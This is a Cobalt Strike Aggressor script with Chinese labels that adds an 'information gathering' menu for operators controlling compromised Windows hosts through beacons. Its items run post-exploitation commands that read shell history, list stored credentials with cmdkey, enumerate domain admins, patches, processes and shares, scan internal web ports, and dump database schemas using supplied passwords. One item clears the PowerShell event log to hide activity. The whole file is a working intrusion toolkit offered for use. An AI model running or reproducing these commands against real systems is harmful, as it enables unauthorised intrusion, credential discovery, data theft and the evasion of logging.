menu "信息收集" {

				item "获取登录的QQ" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "dir \\\\.\\pipe\\\\ | findstr \"QQ_\" | findstr \"_pipe\"");
			}
		}	
				item "获取RDP端口" {
            local('$bid');
            foreach $bid ($1){
                blog($1, "Check Rdp Open Port");
                bpowershell_import($bid, script_resource("/script/RegRdpPort.ps1"));
                bpowerpick($bid,"RegRdpPort");
                bshell($bid,"wevtutil cl \"Windows PowerShell\"");
                }
            }
				item "查看cmd历史命令" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "doskey /history");
			}
		}
				item "查看powershell历史命令" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt");
			}
		}
				item "查看文件浏览历史" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "dir %APPDATA%\\Microsoft\\Windows\\Recent");
			}
		}		
				item "查看SMB指向路径" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic share get name,path");
			}
		}
				item "查看安装程序和版本信息" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic product list brief");
			}
		}
				item "查看安装的补丁" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic qfe  get hotfixid");
			}
		}
				item "查看进程详细" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic process get caption,commandline,processid /value");
			}
		}
				item "查看服务" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net start");
			}
		}
				item "查看防火墙配置" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "netsh firewall show config");
			}
		}
				item "查看域管" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net group \"domain admins\" /domain");
			}
		}
				item "systeminfo" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "systeminfo");
			}
		}
				item "mstsc记录" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "cmdkey /list");
			}
		}
				item "枚举当前域" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net view /domain");
			}
		}
			    item "枚举域上主机列表" {
             prompt_text("domain?", "", lambda({
            bshell(@ids, "net view /DOMAIN:$1");
        }, @ids => $1));
    }
	        item "SharpEventLog" {
			$bid = $1;
			$dialog = dialog("SharpEventLog", %(EventLogType => "-4624",bid => $bid), &SharpEventLog);
			dialog_description($dialog, "获取Windows登录事件日志：读取登录过本机的登录失败或登录成功（4624,4625）的所有计算机信息，在内网渗透中快速定位运维管理人员。");
			drow_combobox($dialog, "EventLogType", "EventLog Type:", @("-4624", "-4625"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpEventLog {
	bexecute_assembly($bid, script_resource("/script/SharpEventLog.exe"), $3['EventLogType']);
}
			item "SharpWebScan" {
			$bid = $1['@'];
			$dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,8080,8001,1433",bid => $bid), &SharpWebScan);
			dialog_description($dialog, "多端口web标题扫描");
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "port", "ports:  ");			
			drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpWebScan {
	$arg = join(' ', @($3['iptype'],$3['ip'],$3['port']));
	bexecute_assembly($bid, script_resource("/script/SharpWebScan.exe"), $arg);
}
			item "SharpCheckInfo" {
			$bid = $1;
			$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpCheckInfo);
			dialog_description($dialog, "收集目标主机信息，包括最近打开的文件，系统环境变量和回收站文件等等。");
			drow_combobox($dialog, "Type", "Type:", @("-All", "-EnvironmentalVariables","-GetRecycle","-AllUserDirectories","-PowershellInfo","-CsharpVersion","-AvProcessEDRproduct","-Defender","-RecentFiles","-NetworkConnentions","-ApplockerEnumerating","-Drives","-LAPS"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpCheckInfo {
	bexecute_assembly($bid, script_resource("/script/SharpCheckInfo.exe"), $3['Type']);
}
			item "SharpSQLDump" {
			$bid = $1['@'];
			$dialog = dialog("SharpSQLDump", %(host => "",username => "",password => "",type => "mysql",bid => $bid), &SharpSQLDump);
			dialog_description($dialog, "内网渗透中快速获取数据库所有库名，表名，列名。具体判断后再去翻数据，节省时间。适用于mysql，mssql。");
			drow_text($dialog, "host", "host:  ");	
			drow_text($dialog, "username", "username:  ");	
			drow_text($dialog, "password", "password:  ");			
			drow_combobox($dialog, "type", "-mysql/-mssql", @("-mysql", "-mssql"));
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpSQLDump {
		$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type']));
		bexecute_assembly($bid, script_resource("/script/SharpSQLDump.exe"), $arg);
}		
			
	}
